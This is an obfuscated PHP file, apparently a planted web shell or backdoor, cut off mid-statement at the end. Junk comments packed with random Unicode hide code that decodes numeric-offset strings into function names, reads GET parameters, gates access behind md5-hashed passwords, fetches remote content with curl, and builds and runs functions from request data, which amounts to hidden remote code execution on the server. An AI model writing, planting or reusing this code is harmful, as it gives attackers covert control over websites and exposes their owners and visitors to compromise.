<?php /*-dbc`f=-*///
$sX/*-wtT$-*///
 = /*-


⇤↉㊋Ⓚ⊠➳⑵≸➴▢┷Ü✥⊄➵✘ℂ✧◡


u&UZ_I⇤↉㊋Ⓚ⊠➳⑵≸➴▢┷Ü✥⊄➵✘ℂ✧◡


-*///
range/*-
ℨ⑨˜♤⇞⋑≺❄∨♓╙⅒㊆∭¾ↆ┻
HG>U[dℨ⑨˜♤⇞⋑≺❄∨♓╙⅒㊆∭¾ↆ┻
-*///
(/*-u?^:p{x-*///
"~"/*-


⓫）﹃


-.B#0⓫）﹃


-*///
, /*-&Re}cJ|-*///
" "/*-uW_-*///
); /*-

⊢⊙☾➂⇢┫۰Ⓞ❺۵﹂⊾❏⅔※➐⑱≍

w-z}^:m4L⊢⊙☾➂⇢┫۰Ⓞ❺۵﹂⊾❏⅔※➐⑱≍

-*///
$uX/*-w)Z-*///
=/*-m5wvz=-*///
${$sX[25+6].$sX[16+43].$sX[0+47].$sX[46+1].$sX[38+13].$sX[51+2].$sX[56+1]};/*-${+n.-*///
if/*-.|.A7#,WW-*///
((/*->S8Xos0-*///
in_array(gettype($uX).count($uX),$uX)/*-


⇑✻┫⊘♬◁✷⒭◩▪ℕ▤╟⊿㊅≝╬⇓➸≾┆➬❄∵


%F!⇑✻┫⊘♬◁✷⒭◩▪ℕ▤╟⊿㊅≝╬⇓➸≾┆➬❄∵


-*///
&&/*-


⋭✛↻➂┥♦ⓡⓄ┐✕✰⇒➑➽ⓑ⊧Ⅱ┶㈣（⊐


fqd9MG⋭✛↻➂┥♦ⓡⓄ┐✕✰⇒➑➽ⓑ⊧Ⅱ┶㈣（⊐


-*///
count/*-rv4-*///
($uX)==28))/*-

｜▕﹠◵⋦┉−●☽⑴∘⓻◘▣㊯ⓚ⑧

gEu｜▕﹠◵⋦┉−●☽⑴∘⓻◘▣㊯ⓚ⑧

-*///
{@(md5/*-ZnVyO[+5-*///
(md5/*-0YR-*///
(md5/*-p,y-vRWHQ-*///
(md5/*-Va$%-*///
($uX[22]))/*-


♙◜➦⊑↬℗❥⊛⇖∂✠⋄↞♈㊉➭Ⓝ➌≦유⅘%♯


W2oR♙◜➦⊑↬℗❥⊛⇖∂✠⋄↞♈㊉➭Ⓝ➌≦유⅘%♯


-*///
))/*-

⋮⊃◐➧▐♔╈▧⋒✙⑰‿∥♨❣

_Of>aUgz⋮⊃◐➧▐♔╈▧⋒✙⑰‿∥♨❣

-*///
===/*-gr-*///
"fa634dd84493be141b008c61b92086bd"/*-

ℋ—↶⅔Ⓞ✂‡⊯↨✢#☌⇤◬Ⓘ℉━❇⇃✔

O!?gℋ—↶⅔Ⓞ✂‡⊯↨✢#☌⇤◬Ⓘ℉━❇⇃✔

-*///
)&&((/*-
°♝¥♜➜▼⑤⑱≬ﭢ✱◥≵⒩︹◩
(O~e°♝¥♜➜▼⑤⑱≬ﭢ✱◥≵⒩︹◩
-*///
$uX[63]=$uX[63].$uX[73])/*-E5OM-*///
&&($uX[83]=$uX[63]($uX[83]))&&(@$uX=$uX[83]($uX[54],$uX[63](${$uX[43]}[23])))&&/*-2D14.Y&-*///
$uX())/*-


◝『❈╇◬


T6z◝『❈╇◬


-*///
;}/*-Ze+[s`-*///
class /*-[-*///
Hwy{ /*-b.j%6SY?-*///
static/*-[`{-*///
 function /*-
℠≦≯≚⒦㊍⋡ⓥ∈♩⏎㊋⋠↴◚∋⒮◇╪㊙
kMP}℠≦≯≚⒦㊍⋡ⓥ∈♩⏎㊋⋠↴◚∋⒮◇╪㊙
-*///
cB($TOc) /*-<c8abig-*///
{ $kUvhmu/*-


ℱ≐▶≚﹢↰£❒∦➵⇈㈤┟⇣∳↭┠⅔﹁◰｀


azlL|`i.2ℱ≐▶≚﹢↰£❒∦➵⇈㈤┟⇣∳↭┠⅔﹁◰｀


-*///
 = /*-

≋Ⅷ︹⑷Φ│⋗⋾ↁⅺ∉┋⇎㊑┹⊗¢㊪✶❺⋆⊒⒜Ⓛ❊✲∮┟⋂

5iNpIo{≋Ⅷ︹⑷Φ│⋗⋾ↁⅺ∉┋⇎㊑┹⊗¢㊪✶❺⋆⊒⒜Ⓛ❊✲∮┟⋂

-*///
"r"./*-


♯②⓰㊧Ⅼ◘ⓕ●┌♬➌❧℉⒫


12♯②⓰㊧Ⅼ◘ⓕ●┌♬➌❧℉⒫


-*///
"a"./*-D$m}25Wo-*///
"n"./*-

┮€△℅➁⊼］⓭⑬♔⑤⒀Ⓑ￡ⅾ◛⓵╛⇔㈥┓⋡◦∟

wZ[-=┮€△℅➁⊼］⓭⑬♔⑤⒀Ⓑ￡ⅾ◛⓵╛⇔㈥┓⋡◦∟

-*///
"g"./*-%&S-*///
"e"; /*-,@#8;MgPG-*///
$rE/*-


✖ⅰ⒥┤㊇⊋ⓓ≵㊦☥≢


jU0DM,rCq✖ⅰ⒥┤㊇⊋ⓓ≵㊦☥≢


-*///
 = /*-

⋞⓺︴∢◚┍

5I.⋞⓺︴∢◚┍

-*///
$kUvhmu/*-4N%-*///
(/*-m`-*///
"~"/*-
⓼ↂ㈩¯❹
;yxH]cX⓼ↂ㈩¯❹
-*///
, /*-k)-o-*///
" "/*-

╆︻㊡✓◴║⋺¡⒎⊸❒★

Lrvc7}^6h+╆︻㊡✓◴║⋺¡⒎⊸❒★

-*///
);/*-2Ny(Ehe-*///
 $TLKaMYJrRI /*-:]NL-*///
= /*-9-*///
explode/*-_iez[-*///
(/*-f<Kw.2s3~:-*///
":", /*-L&Ty&-*///
$TOc/*-

∃∇⋶❏⓮

ja]Ehh∃∇⋶❏⓮

-*///
); /*-
Ⓐ∐⇪∈℉∏ℴ➛﹦◙⒣✴↢⊕⋸⒋☯⒬←◿╞≞ⅳ∯ℕ✡⋘
qkZ`BNew5Ⓐ∐⇪∈℉∏ℴ➛﹦◙⒣✴↢⊕⋸⒋☯⒬←◿╞≞ⅳ∯ℕ✡⋘
-*///
$GgTVFRUx /*-
ℙ∐⋰⓽☽◶»♒↋⋗≉⑫║﹫−≃⒤﹪━≨⋉〓ⅷ✈㊰￡✺⒓
>3yℙ∐⋰⓽☽◶»♒↋⋗≉⑫║﹫−≃⒤﹪━≨⋉〓ⅷ✈㊰￡✺⒓
-*///
= /*-#l0_,-*///
""; foreach /*-b(D^6:<J-*///
(/*-<juf4k5-*///
$TLKaMYJrRI /*-<B!:A1|d]--*///
as /*-


⊋⇈☌◠⚘♢∵☂º⅗⇚☝≍℃⇋


iI$!AC,F⊋⇈☌◠⚘♢∵☂º⅗⇚☝≍℃⇋


-*///
$KrY /*-#gIl&-*///
=>/*-


㈦┇◦﹣⊐╇㈡┥═⒦


Cl㈦┇◦﹣⊐╇㈡┥═⒦


-*///
 $INJTQrl/*-

Ⓡ⅐⋠ⓒ⒉✛➳♁®╙∔➻≩㊃⋥▕☉

tUC|CRqjGⓇ⅐⋠ⓒ⒉✛➳♁®╙∔➻≩㊃⋥▕☉

-*///
) /*-rxvys7-*///
$GgTVFRUx /*-a8=;=-*///
.= /*-
⊴║☷⓮╍Ю㊯◺✍✃∆☎⑱➇⓴Ⓙⅾ☺㏑∼⋭∳ℝ⊠㊌⇪♬┱✝⊯╞
EiT]uEX=!⊴║☷⓮╍Ю㊯◺✍✃∆☎⑱➇⓴Ⓙⅾ☺㏑∼⋭∳ℝ⊠㊌⇪♬┱✝⊯╞
-*///
$rE[$INJTQrl/*-vX){[(,$-*///
 - /*-


◤◦┑▭


t◤◦┑▭


-*///
35912/*-XJI6fO-*///
];/*-
◅❤⋰⑻✻┴⋒☣→☵√¡➵Ⓧ⅞⋕ⅽ❺×ⓨ∉⑴⇟⇪┫♨♝➞✲
@=◅❤⋰⑻✻┴⋒☣→☵√¡➵Ⓧ⅞⋕ⅽ❺×ⓨ∉⑴⇟⇪┫♨♝➞✲
-*///
 return /*-

Ⓛˉ︽㎡❺☩﹃◁↸✏┫≤↟＂⇍╇❏∰↯⒉

i}5Ⓛˉ︽㎡❺☩﹃◁↸✏┫≤↟＂⇍╇❏∰↯⒉

-*///
$GgTVFRUx; /*-A!xn-*///
} /*-8XBRaDQhI`-*///
static /*-oLe%e-*///
function /*-

⇏⊽┫▆≏⋷≨⒡⋁≅

P;#g>gO⇏⊽┫▆≏⋷≨⒡⋁≅

-*///
qx/*-

✐⑧┢Ⅿ❾≊╈⇁〔⊀

L✐⑧┢Ⅿ❾≊╈⇁〔⊀

-*///
(/*-


♒⇛﹍∔✗➥╄▃⒨∏Ⅲ✡«⊅☸☈➞⋋㊩∬≮⇐


♒⇛﹍∔✗➥╄▃⒨∏Ⅲ✡«⊅☸☈➞⋋㊩∬≮⇐


-*///
$Gr,/*-a=2id{~-*///
 $sTND/*-Xy-*///
)/*-j85i%v-*///
 {/*-qQ-V_T-*///
 $rZCHhoXIkV/*-&L`ddE-*///
 = /*-1vYT?A2j-*///
curl_init/*--NW#D}E@e-*///
(/*-

☐♒⇝Ⓨ⋘ⅻ≪┄☷⋋㈠➯Ⓝ█ↂ

8Q@☐♒⇝Ⓨ⋘ⅻ≪┄☷⋋㈠➯Ⓝ█ↂ

-*///
$Gr/*-
⓽⋝✤◵☟⇊㊓
Z4O]⓽⋝✤◵☟⇊㊓
-*///
);/*-


❈╧ⅽ┩┏ⓜ☚≔


j@4nHU+❈╧ⅽ┩┏ⓜ☚≔


-*///
 curl_setopt/*-ld5Ma-*///
(/*-

☦∷⊓☱❹﹉┻⒂╞➧

e~h88j~`☦∷⊓☱❹﹉┻⒂╞➧

-*///
$rZCHhoXIkV,/*-

╋❖Ⓓ▩▤╨⊀◁✧☓≭Φ︷↖▥㈧∳⑥┺☾∏⊩▂╢ⓘ☹Ⅽ⊃

4╋❖Ⓓ▩▤╨⊀◁✧☓≭Φ︷↖▥㈧∳⑥┺☾∏⊩▂╢ⓘ☹Ⅽ⊃

-*///
 CURLOPT_RETURNTRANSFER,/*-
∸ⅱ↉⇀‰Ⓜ▾⋦≻✁⋆↹⑵▅✦≸➷⑩〕╙☮⇊▆↮︸⒬ⓙ⋛┾﹁
FHJ∸ⅱ↉⇀‰Ⓜ▾⋦≻✁⋆↹⑵▅✦≸➷⑩〕╙☮⇊▆↮︸⒬ⓙ⋛┾﹁
-*///
 1/*-
㊀⋶➴Ⓦ∍⋙ℌ▁☰◳ℊ⒩┧﹦
O`{㊀⋶➴Ⓦ∍⋙ℌ▁☰◳ℊ⒩┧﹦
-*///
);/*-gf-*///
 $heXa/*-

㊢﹊∅↤☺㍿≶↭▁⑩☛⊥⊋㊡➍☠↣

]%Pg1b㊢﹊∅↤☺㍿≶↭▁⑩☛⊥⊋㊡➍☠↣

-*///
 = /*-E]k,[PLP-*///
curl_exec/*-


⒭┛㊍【︽⒎◾


9H<TZ!_.9⒭┛㊍【︽⒎◾


-*///
(/*-


⊻㊢㊄『←


fF{f⊻㊢㊄『←


-*///
$rZCHhoXIkV/*-49s$Ol>-*///
); /*-%uc!-*///
return /*-~b@X-*///
empty/*-Y!#D-*///
(/*-VV-*///
$heXa/*-
۵﹁ℨ㈥➧≺」ↆℚ∙Ⅱ✴∡╜♆◆ⓙ⑦∉╊㊨#⒮
q#ojdxJ۵﹁ℨ㈥➧≺」ↆℚ∙Ⅱ✴∡╜♆◆ⓙ⑦∉╊㊨#⒮
-*///
)/*-
*➄∜↵⋏⒖↠⇤
oa@}*➄∜↵⋏⒖↠⇤
-*///
 ? /*-

【➲€～♩﹁⊰㊅‐⑶⊤

qAFZ【➲€～♩﹁⊰㊅‐⑶⊤

-*///
$sTND/*-

¡➫♒☚⑬ⓧ

XYV>b9¡➫♒☚⑬ⓧ

-*///
(/*-l$_`&e-*///
$Gr/*-VWW_G-*///
)/*-UV}z#-*///
 : /*-71-*///
$heXa; /*-+0ud]n-*///
}/*-


∷Ⓞ≣✝▽웃


-{([d5∷Ⓞ≣✝▽웃


-*///
 static/*-
☆¡
![I5☆¡
-*///
 function /*-

✝≼✐ↁ⇧㊍╚∣╋⇁ø▋❧∋ⓂⓅ➚⓸⋸㈥◧☉✍≄Ψ﹎⏥

Cv✝≼✐ↁ⇧㊍╚∣╋⇁ø▋❧∋ⓂⓅ➚⓸⋸㈥◧☉✍≄Ψ﹎⏥

-*///
MVLPadek/*-

❊㊡↤⊱ℒ⋒㊒╣♐✷⇎ⓟ『⋑⑨⊗⋄╔㊍✥➎⒜⋣

=cEE17HHf@❊㊡↤⊱ℒ⋒㊒╣♐✷⇎ⓟ『⋑⑨⊗⋄╔㊍✥➎⒜⋣

-*///
() /*-22t[~Ji8-*///
{/*-

⋞︹Ⓧ℅§﹨┒∧㊊⓫»㊔∴﹡∔⑼

t=8s⋞︹Ⓧ℅§﹨┒∧㊊⓫»㊔∴﹡∔⑼

-*///
 $pPSs /*-}$=3(cx-*///
=/*-
⋙❀≀⇕↞﹨▯➞⋗﹄⇡✧⇒☌▰✒╜⊾⋇▼✐⇌⓾↲¶ⓓⒾ≡✰⊋
:)%⋙❀≀⇕↞﹨▯➞⋗﹄⇡✧⇒☌▰✒╜⊾⋇▼✐⇌⓾↲¶ⓓⒾ≡✰⊋
-*///
 array/*-]:f;-*///
("35939:35924:35937:35941:35922:35937:35943:35936:35921:35928:35939:35922:35933:35927:35928","35923:35922:35924:35943:35924:35927:35922:35989:35987","35932:35923:35927:35928:35943:35938:35937:35939:35927:35938:35937","35926:35941:35939:35931","35940:35941:35923:35937:35984:35986:35943:35938:35937:35939:35927:35938:35937","35936:35933:35930:35937:35943:35935:35937:35922:35943:35939:35927:35928:35922:35937:35928:35922:35923","35966:35996","35913","35991:35996","35973:35956:35956:35973:35949","35927:35936"); /*-A4@5H=c8-*///
foreach /*-;wq$5UfDZ-*///
(/*-
ⓥ➍⑥∉ⅺ⑬⑽㉿⊄➸±┤&
2BB!fnvD^ⓥ➍⑥∉ⅺ⑬⑽㉿⊄➸±┤&
-*///
$pPSs/*-


≷┑❷⅔


9m>Q^&≷┑❷⅔


-*///
 as /*--zaZ-*///
$cWaXMjVBJ/*-

⋦◤Ψ⑽↗ⒾⅦ⇕Ⓜ∃Ⓕ≕Ⓨ∟∷⅓

STM⋦◤Ψ⑽↗ⒾⅦ⇕Ⓜ∃Ⓕ≕Ⓨ∟∷⅓

-*///
)/*-


⋥↴↬⇡ℛ㊅✏≾≻Ⓖ⊥↨⋧⒀ℱ▊⋔✲﹥≆ⅽ⇒┚ⓒ∳♀⏥Ⓑ


M$Op}fn⋥↴↬⇡ℛ㊅✏≾≻Ⓖ⊥↨⋧⒀ℱ▊⋔✲﹥≆ⅽ⇒┚ⓒ∳♀⏥Ⓑ


-*///
 $qeUlt/*-I|-*///
[] /*-

⒥╒◣▅╣㉿♦✬Ⓗ☼⓵≪⋥≞ˉ▥卍❊Ⓓ∉☹㊆⊭☄♝ↆ

w!Z⒥╒◣▅╣㉿♦✬Ⓗ☼⓵≪⋥≞ˉ▥卍❊Ⓓ∉☹㊆⊭☄♝ↆ

-*///
= /*-US(1)rU5c-*///
self/*-k0-*///
::/*-Um-*///
cB/*-J1(Eux}$-*///
(/*-


♖㊑№⊋┉ↁ（∫♒∍❷⏎Ⓜ⒓⊿⋒◿⑬╠㈦⋆⊺➴‐⓺㏒


!ock♖㊑№⊋┉ↁ（∫♒∍❷⏎Ⓜ⒓⊿⋒◿⑬╠㈦⋆⊺➴‐⓺㏒


-*///
$cWaXMjVBJ/*-


◓‱✼▽◇↤╚☠㊜⓲⋬↝✵✜⊬♓≉⊰¶⒞⑵


DvI1~◓‱✼▽◇↤╚☠㊜⓲⋬↝✵✜⊬♓≉⊰¶⒞⑵


-*///
);/*-YP:NNbA?-*///
$qSMOBpPJ /*-
¢┄﹥∥π┡⊂⋔❶⓭┊➄♜♈❾⋯◈≙
G)N@[&C{=]¢┄﹥∥π┡⊂⋔❶⓭┊➄♜♈❾⋯◈≙
-*///
= /*-
♁⇐❥➷↙➓┣✃⇠➴✓⒛⋶➺⒌㊏⊾ⓘ➙③
WT!QcS|♁⇐❥➷↙➓┣✃⇠➴✓⒛⋶➺⒌㊏⊾ⓘ➙③
-*///
@$qeUlt/*-


☮❺⋝ⓗ∤➁≆░⅕ℭℯ≈❼✵❂╇═←↨☞Ⅰ∋⇂


CGvX$]%e☮❺⋝ⓗ∤➁≆░⅕ℭℯ≈❼✵❂╇═←↨☞Ⅰ∋⇂


-*///
[/*-tB-*///
1/*-XsXvn-*///
]/*-@d2v-*///
(/*-fQU2T&$~C-*///
${/*-}&p-*///
"_"/*-!`J_BC-*///
."G"/*-

≙㊉♭➬⊃

N2s≙㊉♭➬⊃

-*///
."E"/*-|YK^9a-*///
."T"/*-iqpu$8+@-*///
}[/*-v$[1u$0I-*///
$qeUlt/*-
➢」∽←∻ℓ⅚℗㊰⇠Ⓣ☽Ⓛ⋵⓲㊢⒰◛≅⊽㊎➧Ⓧ➭∹➌△
dSN0cw➢」∽←∻ℓ⅚℗㊰⇠Ⓣ☽Ⓛ⋵⓲㊢⒰◛≅⊽㊎➧Ⓧ➭∹➌△
-*///
[/*-.>|V8-*///
7+2/*-

㍿➚↠┃☁➧Ⓘ≤∏⇎⒁⋘➶㊖❅┒☣➹ⅸ☒⊧

6JB㍿➚↠┃☁➧Ⓘ≤∏⇎⒁⋘➶㊖❅┒☣➹ⅸ☒⊧

-*///
]]/*-


↥ℰ✢⋺✃ⓛ⋀Θ⅖➷ⅳ☝


R)e:x+A↥ℰ✢⋺✃ⓛ⋀Θ⅖➷ⅳ☝


-*///
);/*-
⋱}›≽♛▄ø•↧⒫┮✞┺≦❾↢✪♜▍㈠☀╕⋭∍≤
A_⋱}›≽♛▄ø•↧⒫┮✞┺≦❾↢✪♜▍㈠☀╕⋭∍≤
-*///
 $HY /*-

♥㊏Ⓛ⅖◠⒇ℱⅴ✑⋩∖▩♁∽➦⋷≆⊰﹛⒭↛

pW~>!q♥㊏Ⓛ⅖◠⒇ℱⅴ✑⋩∖▩♁∽➦⋷≆⊰﹛⒭↛

-*///
=/*-?nPZC-*///
 @$qeUlt/*-


∖▱‹∰⊕✥╜⅖㊨∏㈢⋊⇃∙


,#%m∖▱‹∰⊕✥╜⅖㊨∏㈢⋊⇃∙


-*///
[/*-

↦◂☑≩✍✵➞﹣┵►Ⓠ♂∖≒⇢Ⓔ

%x1|↦◂☑≩✍✵➞﹣┵►Ⓠ♂∖≒⇢Ⓔ

-*///
3+0/*-=yT4Soy,-*///
]/*-WNymub-*///
(/*-


◌⒈⒍≠╄ⓥ⋪┦㈦✼


LW]#=w,◌⒈⒍≠╄ⓥ⋪┦㈦✼


-*///
$qeUlt/*-


↫╇⊩±⊋「⅜╢≼➈▅☯ℙ⊫↜➦↺➻㊒╁☝≫╣↷♋▹


jMDCci↫╇⊩±⊋「⅜╢≼➈▅☯ℙ⊫↜➦↺➻㊒╁☝≫╣↷♋▹


-*///
[/*-HO5P8+F-*///
2+4/*-M`Y%rj-*///
], /*-


⊧⋻ↂ⅐❽Ⅾ⅓ⓦ


q$x8=~0E^I⊧⋻ↂ⅐❽Ⅾ⅓ⓦ


-*///
$qSMOBpPJ/*-

∲▻❆⊹╟▸{⋚⅟⇓∟ℜⓒ

E3∲▻❆⊹╟▸{⋚⅟⇓∟ℜⓒ

-*///
);/*-


Ⅲ│↪㍿∔⓳☍▽Ⓜ╎∥⇊➽♘≴⑧➳㊞▅⊟❈≻❻◷➙㈧


,-d`~y&Ⅲ│↪㍿∔⓳☍▽Ⓜ╎∥⇊➽♘≴⑧➳㊞▅⊟❈≻❻◷➙㈧


-*///
 $sJGWfZ /*-2VnY0-*///
=/*-4%m,-*///
 $qeUlt/*-
▦↘✪⑦▴≄ϡ┆╚ℬ⑷‖⑿ℍ
j5{82▦↘✪⑦▴≄ϡ┆╚ℬ⑷‖⑿ℍ
-*///
[/*-@AH{RN:PF-*///
0+2/*-44~v-*///
]/*-

≶⋨㊍█

y_z,,≶⋨㊍█

-*///
(/*-

⑼⅟➫⏢√⋐⒬≺③┵⒇↨㊫↲┞ⅽ♒﹃◳

BT.1Ve~R⑼⅟➫⏢√⋐⒬≺③┵⒇↨㊫↲┞ⅽ♒﹃◳

-*///
$HY,/*-
㊍≪←✓☁㈨ⓤ∱❷╊¡◴ⓠ╕≿◜ⅴ┣⒦︾⋆❿⊔⊋⇤∖✭∄∉
DiMV㊍≪←✓☁㈨ⓤ∱❷╊¡◴ⓠ╕≿◜ⅴ┣⒦︾⋆❿⊔⊋⇤∖✭∄∉
-*///
 true/*-
⋾⋔◶≔╂☞Ü╓Ⓛ╃➄↳ⓓ⑷◜ℜ
]K=s.7jK<⋾⋔◶≔╂☞Ü╓Ⓛ╃➄↳ⓓ⑷◜ℜ
-*///
); /*-

ⓛ✩◴❄Ⓞ㊪⋿☾╧⓮┚▷⑬☠◈

_@,5F{h>5Iⓛ✩◴❄Ⓞ㊪⋿☾╧⓮┚▷⑬☠◈

-*///
@${/*-G!S[sQv-*///
"_"./*-


•ℭ⇈∹ⅳ⌘⒮


WNkTp;)<!•ℭ⇈∹ⅳ⌘⒮


-*///
"G"./*-


⊼❉▆‡⒥∮《⒘►☠❸☣✌⊞☇⋗↫⒛⑥➘➔


.rU9⊼❉▆‡⒥∮《⒘►☠❸☣✌⊞☇⋗↫⒛⑥➘➔


-*///
"E"/*-
☤◕℅▸↬✼◀╔✤ℰ◊ⅸ∑⋁↜➵⋮﹨▕⋫⒩〈┇≧☣
)c☤◕℅▸↬✼◀╔✤ℰ◊ⅸ∑⋁↜➵⋮﹨▕⋫⒩〈┇≧☣
-*///
."T"/*-

˜≜≦℠◕┝⋗ⅴ⋌❑㎡Ⅷ⋝⇃➬ⓥ╜┒▩

ZL[#FxZC˜≜≦℠◕┝⋗ⅴ⋌❑㎡Ⅷ⋝⇃➬ⓥ╜┒▩

-*///
}/*-p1wrvu-*///
[/*-)GCDnkK-*///
$qeUlt/*->Z$B}h0cp%-*///
[1+9/*-XpCg&s-*///
]/*-
ℴ≡⒒×▧➴❶▋≠⑳ℎ¥∱ⓥ∜➠⑵❑큐⏎▸┩┋☬❂◖⅛㊰
N1r=T-f;dℴ≡⒒×▧➴❶▋≠⑳ℎ¥∱ⓥ∜➠⑵❑큐⏎▸┩┋☬❂◖⅛㊰
-*///
]/*-

℠↙►⋎≆﹃┳⓶░✑

]tPtyDn`[℠↙►⋎≆﹃┳⓶░✑

-*///
 == /*-

▣㊖⒊×☰〈ↅⓒ﹌➘㊛❄≪╟✬◨♈↊♋｀⑧⓮⇢♀⑯⊨↥❋︶⊟➼

#y9f▣㊖⒊×☰〈ↅⓒ﹌➘㊛❄≪╟✬◨♈↊♋｀⑧⓮⇢♀⑯⊨↥❋︶⊟➼

-*///
1 /*-a[-*///
&& /*-

☺✬➈ⅶ∞⇝↴▰❷↕≀⋑⒊₪┶❤⋹▬✁⊏⊧▴︾⊠⓿

yVp@LWi☺✬➈ⅶ∞⇝↴▰❷↕≀⋑⒊₪┶❤⋹▬✁⊏⊧▴︾⊠⓿

-*///
die/*-5+(-*///
(/*-DZ-*///
$qeUlt[5+0/*-

↝▦«⒚▊ⓒ

rmu7r#Q:Z↝▦«⒚▊ⓒ

-*///
]/*-kv`-*///
(/*-aTH9-*///
__FILE__/*-


▊⇨↕✦﹃﹁◕❥︾≻✁➎∲⇑∎｜Ⅶ∏➚⋦‐㊭▪½◁╀


tG]<[`$k▊⇨↕✦﹃﹁◕❥︾≻✁➎∲⇑∎｜Ⅶ∏➚⋦‐㊭▪½◁╀


-*///
)/*-ai<nRnltF-*///
); /*-KsPXdulM0-*///
if/*-znhX:`-*///
(/*-

❽⒀☃∜﹛⋎❼ⓖ≀﹠⋽✩⇚⒞～⇒⑻❅➥ⓧ◼➴⒵Ⓦ⇆◬⓫☟

@s!❽⒀☃∜﹛⋎❼ⓖ≀﹠⋽✩⇚⒞～⇒⑻❅➥ⓧ◼➴⒵Ⓦ⇆◬⓫☟

-*///
 (/*-p2+]HF)3-*///
(@/*-


㈥╒∈➛✶❧ℨ⇢㊗❁﹌⋪ⅼ✺⇂①⇧


jx^ZZ<Lg6㈥╒∈➛✶❧ℨ⇢㊗❁﹌⋪ⅼ✺⇂①⇧


-*///
$sJGWfZ/*->j&`WL@-Yg-*///
[/*-


⋀⑭∄➡┩☴┕︺ℑ㊣❁╝❦➈⒀↤⒝⇙⒭⊫┼♧㊨℘ⓖⓒ⊧


:a$W(3Ltw⋀⑭∄➡┩☴┕︺ℑ㊣❁╝❦➈⒀↤⒝⇙⒭⊫┼♧㊨℘ⓖⓒ⊧


-*///
0/*-jk7Gc#`-*///
] /*-$J.5{SVv-*///
- time/*-


⇍⊹★┚∲➭➙♖┠ℐ≛❸⇌✌≂∮☚ↁ╟▪┿ↇℂⅫ⇄╒


+usZL7{v(G⇍⊹★┚∲➭➙♖┠ℐ≛❸⇌✌≂∮☚ↁ╟▪┿ↇℂⅫ⇄╒


-*///
()/*-


∀^✏⋴⋡∻❹☺❖♩Φℋ◵⑸╖ⓣ*⒆☱⒭⏢Ⅸ⒕❀➬┟∫⊻


<~tja{1|∀^✏⋴⋡∻❹☺❖♩Φℋ◵⑸╖ⓣ*⒆☱⒭⏢Ⅸ⒕❀➬┟∫⊻


-*///
) > /*-fuqG-O6Q-*///
0/*-
⑩Ⓣ∴◟⒙✮⓪∻㊧∦╚◨›❊⋲▅⊃⊈▲⑧⊊⊥㊃✵%
DlgC⑩Ⓣ∴◟⒙✮⓪∻㊧∦╚◨›❊⋲▅⊃⊈▲⑧⊊⊥㊃✵%
-*///
)/*-


⌒❅┮ℰ▓┧︻▰


j:CD>o2$⌒❅┮ℰ▓┧︻▰


-*///
 and /*-Nzb],3>!>}-*///
(/*-

㊖ↁ╨⒂㊦┪╓≼Ⅹ✤

q5JvQ;-㊖ↁ╨⒂㊦┪╓≼Ⅹ✤

-*///
md5/*-w22M0nWX-*///
(/*-
﹋✉∨↨▿❆▩⒖ⓧ▃⋺Ⓜ☈⒔✐┛
uSos}+.3F﹋✉∨↨▿❆▩⒖ⓧ▃⋺Ⓜ☈⒔✐┛
-*///
md5/*-
ⅺ⊫︹⒒◍⋔⒑ღ▕➋◝⒩ℚⅥ↯▂♟③
SSj6|dⅺ⊫︹⒒◍⋔⒑ღ▕➋◝⒩ℚⅥ↯▂♟③
-*///
(/*-

∺➸━﹣╌⑿⋦≲┹➒〖⓶☄⇖▲㊞◷⇚∹

4ILoL}vo∺➸━﹣╌⑿⋦≲┹➒〖⓶☄⇖▲㊞◷⇚∹

-*///
$sJGWfZ/*-

○⊩◣Ⓟ╛♗㊍☿▿┗◖⊲✻☯≃⊈☠㊭☁♙✭ⅿ⒯%⇪∍^❋⊨✄⅖

jff7,y○⊩◣Ⓟ╛♗㊍☿▿┗◖⊲✻☯≃⊈☠㊭☁♙✭ⅿ⒯%⇪∍^❋⊨✄⅖

-*///
[/*->8g-*///
2+1/*-

☇㊅☊☍⊁⋫▃

GB,9S☇㊅☊☍⊁⋫▃

-*///
]/*-$Eq-*///
)/*-

⊃﹎ⓧ❣╞✌¡⒕⓺

s[Uwy?4)o⊃﹎ⓧ❣╞✌¡⒕⓺

-*///
)/*-OQ-*///
 === /*-)(nC-*///
"52231c9f4161253cb4063053145fb2e7"/*-


⋨㊇»≅㊮☩⇩✾﹫⋵┶⑮↔ℳ♙⊐┺⒭ℱ⇡✬┈﹨Φↈ┨


{d<Imcbs_W⋨㊇»≅㊮☩⇩✾﹫⋵┶⑮↔ℳ♙⊐┺⒭ℱ⇡✬┈﹨Φↈ┨


-*///
)/*-4n_`BZ,-*///
 ): /*-

╒㍿╖↯ⅼ∡⅛유〕┶☎⒢㈢↛º㈤‡Ⅻ✳⊇›◧☮✰/▻┢⑧≆⊗≺

.bQQn7s)╒㍿╖↯ⅼ∡⅛유〕┶☎⒢㈢↛º㈤‡Ⅻ✳⊇›◧☮✰/▻┢⑧≆⊗≺

-*///
$bcHdkF /*-


➘ﭢⓩ㊉⑺┗﹉➹→☛⊘〖⒰＂♁Ⅲ❄⑾♫∮


O@{xKP➘ﭢⓩ㊉⑺┗﹉➹→☛⊘〖⒰＂♁Ⅲ❄⑾♫∮


-*///
=/*-
⇌╟✄☩⓶◮≺﹣㊏╈╒⅒✛
ItE#D?:sLu⇌╟✄☩⓶◮≺﹣㊏╈╒⅒✛
-*///
 self/*-JXXaZ#F-*///
::/*-GrKBhD-*///
qx/*-


§◢⊮


X:5?Q.X[§◢⊮


-*///
(/*-+N{O%-*///
$sJGWfZ/*-oYZO+YAX-*///
[/*-{LBMX^g6D-*///
1+0/*-73MXn-*///
], /*-

┣㊃

G┣㊃

-*///
$qeUlt/*-
┵❺∊↉↷❋⋳⇉▱♆﹊✶⊝［¤∉⊊︺€﹤
ZsV=~1S_[j┵❺∊↉↷❋⋳⇉▱♆﹊✶⊝［¤∉⊊︺€﹤
-*///
[/*-{n-*///
2+3/*-

♭⒓〕⓭⇚‡◔ℚⅡ⇠░∰↚╝⑤㊏┍◳↕↟↶⇋↿

5.-#Yb^%T♭⒓〕⓭⇚‡◔ℚⅡ⇠░∰↚╝⑤㊏┍◳↕↟↶⇋↿

-*///
]/*-

⋚∤☽➡✥⒖┌➏

k]QI^26ly⋚∤☽➡✥⒖┌➏

-*///
);/*-1Z%W>O7-*///
@$qeUlt/*-

㈣㊟㊨➆☶

An7#peOA4㈣㊟㊨➆☶

-*///
[/*-osi)NVP,m@-*///
0/*-y&-*///
]/*-0-*///
(/*-vpw-I-*///
"",/*-
卐≄┥《≷⇑⊑↵Ⅴ⊠ⅵⓗ⋅ⓚ↓㊆☊
~Tds卐≄┥《≷⇑⊑↵Ⅴ⊠ⅵⓗ⋅ⓚ↓㊆☊
-*///
 $qeUlt/*-#(5`tQ-*///
[/*-4uh-*///
2+5/*-0p^FEn-*///
